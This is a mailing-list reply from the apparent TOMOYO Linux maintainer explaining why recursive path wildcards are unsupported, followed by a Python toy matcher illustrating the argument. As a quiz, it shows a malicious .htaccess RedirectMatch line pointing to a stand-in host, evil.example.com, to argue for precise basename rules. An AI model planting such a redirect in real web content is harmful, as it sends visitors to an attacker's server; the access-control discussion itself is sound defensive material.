Hello.

Vladimir Petrovic wrote:
> First of all, I'd like to thank you for such a nice product. I was
> working before with selinux (on centos servers) and apparmor (on my
> desktop machine) and tomoyo is definitely the most easy one to setup,
> and yet it is quite powerful (much more then apparmor). I especially
> like how the process tree is displayed and I can see which execution
> path is doing what.
Thank you for using TOMOYO.

> I'm setting it up my desktop machine to "isolate" firefox and similar
> programs from the rest of the system (mandriva 2009.1, tomoyo 1.6.7).
> I've put:
> 
> initialize_domain /home/vladap/software/firefox/firefox
> keep_domain /home/vladap/software/firefox/firefox
> 
> so I can easily "isolate" firefox. I would like to give permission to
> firefox to do whatever it wants in the
> /home/vladap/data/firefox directory.  But, I couldn't find the easy
> way except repeating many times:
> 
> path_group FIREFOX <path>/\*
> path_group FIREFOX <path>/\*/
> path_group FIREFOX <path>/\*/\*
> path_group FIREFOX <path>/\*/\*/
> path_group FIREFOX <path>/\*/\*/\*
> ...
> 
> and then for subdirectories, and so on. Maybe I didn't find the right
> way, but I think it would be much more usable if tomoyo would support
> something like ** (in apparmour) which would match any character
> including the / (no matter how many subdirectories are there).
This "recursive" option has been asked for several times, but I haven't
implemented it yet. Three reasons. First is that you can create them by

  BASE=/home/vladap/software/firefox/firefox
  # one path_group line per directory level: BASE/\*, BASE/\*/\*, ...
  for i in `seq 1 100`
  do
    echo -n "path_group FIREFOX $BASE"
    for j in `seq 1 $i`; do echo -n '/\*'; done
    echo
  done

if you want.

Second is that I don't like pathnames which don't care about the basename part.

Quiz: What happens if you granted someone to upload web contents under
/var/www/html/ directory and that person uploaded /var/www/html/.htaccess
with the content shown below?

  RedirectMatch (.*) http://evil.example.com/cgibin/poison-it?$1

Answer: The client will be redirected to malicious server.

Not checking the basename part of a pathname causes a security problem.
Name based access control can restrict the basename part of a pathname while label
based access control can't. This is why TOMOYO could be merged into mainline.
I want to keep name based access control as precise as possible.

The "recursive" option will act something like

  allow_write /var/www/html/\*
  allow_write /var/www/html/\*/\*
  allow_write /var/www/html/\*/\*/\*

and I don't think it is secure. It should be something like

  allow_write /var/www/html/\*.html
  allow_write /var/www/html/\*/\*.html
  allow_write /var/www/html/\*/\*/\*.html

Third is that TOMOYO uses pathname's depth (number of slashes in a pathname)
for avoiding useless comparison that never matches
(e.g. comparing /bin/true and /var/www/html/\*/\*/\*/\*/\*/\*/\*.html ).
Allowing a "recursive" option would destroy TOMOYO's string comparison logic.


> Also, then in the domain_policy I have to say
> allow_read/write @FIREFOX
> allow_create @FIREFOX
> allow_unlink ...
> allow_symlink ...
> allow_rename ...
> 
> I also think it would be good to have "allow_everything" option. I
> know that for "proper" security you should not use such "general"
> approach, but for deskop systems I think they would be very useful. Or
> maybe something like that exists and I just couldn't find it :-)
That should be handled by the userland program, not by the kernel.
I won't aggregate them as "everything".

Regards.

_______________________________________________
tomoyo-users-en mailing list
[email protected]
http://lists.sourceforge.jp/mailman/listinfo/tomoyo-users-en
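The points made in the reply above (a `\*` per directory level, the `.htaccess` quiz, and the slash-count pre-filter) can be checked with a small toy matcher. This is an added example written for this page, not TOMOYO's own code or policy syntax; it models only the `\*` wildcard (zero or more characters other than `/`) and ignores TOMOYO's other wildcards, and the `LOOSE_RULES`, `STRICT_RULES` and `UPLOADED` values are constructed sample data.

```python
import re

# Added example, not TOMOYO's code. Assumption: only the \* wildcard is
# modelled (zero or more characters other than '/'); TOMOYO's other
# wildcards (\@, \?, \$, ...) are out of scope.


def generate_path_group(name, base, depth):
    r"""Equivalent of the shell loop in the mail: one path_group line per
    directory level, base/\*, base/\*/\*, ... up to `depth` levels."""
    return [f"path_group {name} {base}" + "/\\*" * i for i in range(1, depth + 1)]


def pattern_to_regex(pattern):
    r"""Translate a TOMOYO-style pattern into a Python regex; \* -> [^/]*."""
    out = []
    i = 0
    while i < len(pattern):
        if pattern.startswith("\\*", i):
            out.append("[^/]*")
            i += 2
        else:
            out.append(re.escape(pattern[i]))
            i += 1
    return "".join(out)


def tomoyo_match(pattern, path):
    r"""True if `path` is matched by `pattern`. Because \* never consumes a
    '/', a pattern can only match pathnames with the same number of slashes,
    which is the cheap pre-filter the mail describes."""
    if pattern.count("/") != path.count("/"):
        return False
    return re.fullmatch(pattern_to_regex(pattern), path) is not None


def index_by_depth(rules):
    """Bucket rules by slash count so a lookup only compares against rules
    that can possibly match. A ** wildcard has no fixed depth and could not
    be bucketed this way."""
    index = {}
    for rule in rules:
        index.setdefault(rule.count("/"), []).append(rule)
    return index


def lookup(index, path):
    """Return the rules that match `path`, consulting only its depth bucket."""
    return [r for r in index.get(path.count("/"), []) if tomoyo_match(r, path)]


# Constructed sample policies for the .htaccess quiz in the mail.
LOOSE_RULES = ["/var/www/html/\\*", "/var/www/html/\\*/\\*"]
STRICT_RULES = ["/var/www/html/\\*.html", "/var/www/html/\\*/\\*.html"]
UPLOADED = "/var/www/html/.htaccess"

if __name__ == "__main__":
    for line in generate_path_group("FIREFOX", "/home/vladap/data/firefox", 3):
        print(line)
    # The loose policy lets the uploader write .htaccess; the strict one
    # (basename restricted to *.html) does not.
    print("loose  :", lookup(index_by_depth(LOOSE_RULES), UPLOADED))
    print("strict :", lookup(index_by_depth(STRICT_RULES), UPLOADED))
    # The deep pattern from the mail is rejected for /bin/true by the slash
    # count alone, before any character comparison.
    print(tomoyo_match("/var/www/html/\\*/\\*/\\*/\\*/\\*/\\*/\\*.html", "/bin/true"))
```

Running it prints the three generated path_group lines, shows that `/var/www/html/\*` matches the uploaded `.htaccess` while `/var/www/html/\*.html` does not, and shows the `/bin/true` comparison short-circuited by the depth check.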
